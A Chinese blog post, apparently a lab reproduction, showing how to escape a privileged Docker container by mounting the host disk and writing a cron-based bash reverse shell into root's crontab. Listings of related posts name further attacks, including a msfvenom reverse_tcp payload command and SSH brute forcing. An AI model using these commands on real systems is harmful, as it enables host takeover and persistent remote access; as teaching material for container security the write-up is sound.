复现利用特权模式docker逃逸

最新推荐文章于 2023-05-09 17:21:30 发布
最新推荐文章于 2023-05-09 17:21:30 发布
阅读量1.4k 收藏 1
点赞数 1
分类专栏: 漏洞复现 文章标签: docker cve 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_54713392/article/details/116941880
版权

复现利用特权模式docker逃逸

漏洞说明:
获取某个系统shell后发现其是docker,这时候我们就需要进行docker逃逸来拿到其真正宿主的权限,利用特权模式逃逸

靶机:ubantu16.0 IP地址 192.168.32.142

Docker version 小于 18.09.2版本

当管理员执行docker run -privileged时,Docker容器将被允许访问主机上的所有设备,并可以执行mount命令进行挂载。
(1)下载centos镜像
执行命令:docker pull centos
在这里插入图片描述

查看centos镜像ID号300e315adb2f
在这里插入图片描述

(2)启动容器
执行命令:docker run -it --privileged 300e315adb2f /bin/bash
在这里插入图片描述

(3)新建一个文件用来挂载

mkdir /abc

在这里插入图片描述

mount /dev/sda1 /abc 挂载
在这里插入图片描述

(4)开启监听端口 nc -lvp 端口号
在这里插入图片描述

(5)执行攻击代码

echo '* * * * * bash -i >& /dev/tcp/192.168.32.142/888 0>&1' >> /abc/var/spool/cron/crontabs/root

在这里插入图片描述

(6)注意root文件600权限
执行命令:chmod 600 /var/spool/cron/crontabs/root
在这里插入图片描述

(7)由于我的docker version版本是20.XX的所以没有反弹shell

清风-77
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用redis漏洞反弹shell
qq_54713392的博客
04-20 2072
利用redis漏洞反弹shell 攻击机:kali 192.168.32.132 目标机:centos7 192.168.32.144 (1)在目标机centos中安装redis服务器(redis-server) 解压,进入源码目录,然后编译(make、make install) 解压文件:tar -zxvf redis-2.8.17.tar.gz 移动解压文件 执行命令:mv redis-2.8.17 /usr/local/redis 进入到目录下:cd /usr/local/redis 执行ma
利用docker来部署fastdfs集群.zip
最新发布
01-09
利用docker来部署fastdfs集群.zip
Docker逃逸原理
11-06
Docker有6大Namespace,PPT中分析了6个Namespace的基本原理和最终逃逸原理
DockerDocker逃逸小结
woodwhale的博客
03-28 1760
docker逃逸小结
docker容器逃逸原理
qq_416805766的博客
08-15 2193
原文链接:https://www.freebuf.com/articles/container/245153.html Docker是时下使用范围最广的开源容器技术之一,具有高效易用等优点。由于设计的原因,Docker天生就带有强大的安全性,甚至比虚拟机都要更安全,但你可曾想过“坚不可摧”的Docker也会被人攻破,Docker逃逸所造成的影响之大几乎席卷了全球的Docker容器。 本期美创安全实验室将会带大家研究造成Docker逃逸的根本原理以及相应的防御方法。 Docker简介 Doc.
docker复现CTF题的一次流程
wuerror的博客
01-23 4854
我使用的虚拟机是18.04Ubuntu 1.安装docker,这一步挺多教程的,就不详细说了。 2.在菜鸟课程学习了一下docker的基础教程。 几个常用到的命令: (1)docker image  查看本地的docker镜像 (2)docker ps 查看正在运行的docker (3)docker run [options] image [command] [arg...] 用到的...
记一次docker逃逸学习
hongduilanjun的博客
03-23 4281
本文首发于先知社区:https://xz.aliyun.com/t/9966 记一次docker逃逸拿shell的靶场渗透。 环境搭建 靶场: ubuntu 内网ip:192.168.183.10 外网ip:192.168.1.6 域内主机: win7:192.168.183.129 win2008:192.168.183.130 需手动开启ubuntu的docker环境,对应的端口服务如下 2001 struts2 2002 tomcat8 2003 phpmyadmin 4.8.1 外网打点 端
关于Docker逃逸
qq_50854662的博客
04-27 388
关于Docker逃逸
docker逃逸的几种方法
自知.的博客
05-09 854
docker逃逸几点思路 1、docker daemon api未授权访问 2、privileged 特权模式启动容器 3、利用dirty cow来进行docker逃逸 4、通过cve-2019-5736来达到docker逃逸
docker逃逸复现CVE-2020-15257-host模式容器逃逸漏洞)
m0_63306943的博客
02-28 1105
因为docker所使用的是隔离技术,就导致了容器内的进程无法看到外面的进程,但外面的进程可以看到里面,所以如果一个 Docker 容器内部可以操作该容器的外部资源,一般理解为操作宿主机的行为。叫做docker逃逸。host模式这种模式下,容器和主机已经没有网络隔离了,它们共享同一个网络命名空间,容器的网络配置和主机完全一样,使用主机的IP地址和端口,可以查看到主机所有网卡信息、网络资源,在网络性能上没有损耗。但也正是因为没有网络隔离,容器和主机容易产生网络资源冲突、争抢,以及其他的一些问题。
Docker操作复现(WoniuSales环境搭建)
dragoncoding的博客
11-17 511
docker在centos7上的部署
经验之谈:八种Docker容器开发模式
02-26
Docker优点已经说过很多次,这里不做详述,Docker现在越来越受到开发人员的青睐,而且利用Docker开发的人也越来越多,本文来自VidarHokstad博客,他是一名Docker开发资深人士,他总结了开发Docker容器的8种模式。...
Docker逃逸:从一个进程崩溃讲起.pdf
08-08
本议题会简单的介绍Docker和Apport并分享如何通过一个Apport漏洞来完成Docker逃逸。 From a crash to docker escape •Basics of docker •An apport vulnerability •A way to leverage CVE-2018-6552•Demo
ssh漏洞
qq_54713392的博客
05-09 2035
ssh漏洞 利用msf中的ssh_login模块对metasploitable的ssh服务实施爆破攻击 在kali里启动msf 使用search查询ftp_login模块,然后使用use调用该模块 设置连接metasploitable的ip地址,使用set rhosts ip地址 设置用户名和密码文件 Run实行爆破 ...
Web框架漏洞--Struts2 漏洞S2-045
qq_54713392的博客
05-08 1277
Web框架漏洞–Struts2 漏洞S2-045 漏洞原理: 在使用基于Jakarta插件的文件上传功能时,有可能存在远程命令执行,导致系统被黑客入侵。恶意用户可在上传文件时通过修改HTTP请求头中的Content-Type值来触发该漏洞,进而执行系统命令。 攻击机:window10 IP:192.168.32.1 靶机:ubantu16.04 IP:192.168.32.142 (1)使用vulhub靶场,进入到s2-045漏洞目录下 开启s2-045环境 执行命令:docker-compose
ms16-016提权
qq_54713392的博客
05-08 1136
ms16-016提权 简介:靶机需32位windows系统 攻击机:kali IP地址为:192.168.32.132 目标机:windows32 IP地址:192.168.32.135 先ping两台主机看是否通 步骤: 1)生成木马,设置本地ip地址192.168.32.132和端口号4444 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.32.132 LPORT=4444 -f exe > /root/test.exe 2)
复现Fastjson 1.2.47 远程命令执行漏洞
qq_54713392的博客
05-14 1121
复现Fastjson 1.2.47 远程命令执行漏洞 漏洞原理: Fastjson是阿里巴巴公司开源的一款json解析器,其性能优越,被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单,而在1.2.48以前的版本中,攻击者可以利用特殊构造的json字符串绕过白名单检测,成功执行任意命令。 攻击机:window 10 IP地址192.168.32.1 靶机:ubantu 16.04 IP地址192.168.32.142 攻击步骤: (1)开启Fastjson
k8s docker逃逸
10-17
k8s docker逃逸是指攻击者通过容器内部的漏洞,从容器中逃脱并获取主机的控制权。这种攻击方式可以对整个集群造成严重的影响,因此需要采取一些措施来防止这种攻击。 一些防御措施包括: 1. 使用最小化的容器镜像,减少容器内部的漏洞。 2. 限制容器的权限,例如使用非特权用户运行容器。 3. 使用安全的网络策略,例如使用网络隔离和网络策略来限制容器之间的通信。 4. 定期更新和修补容器镜像和 Kubernetes 集群组件。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值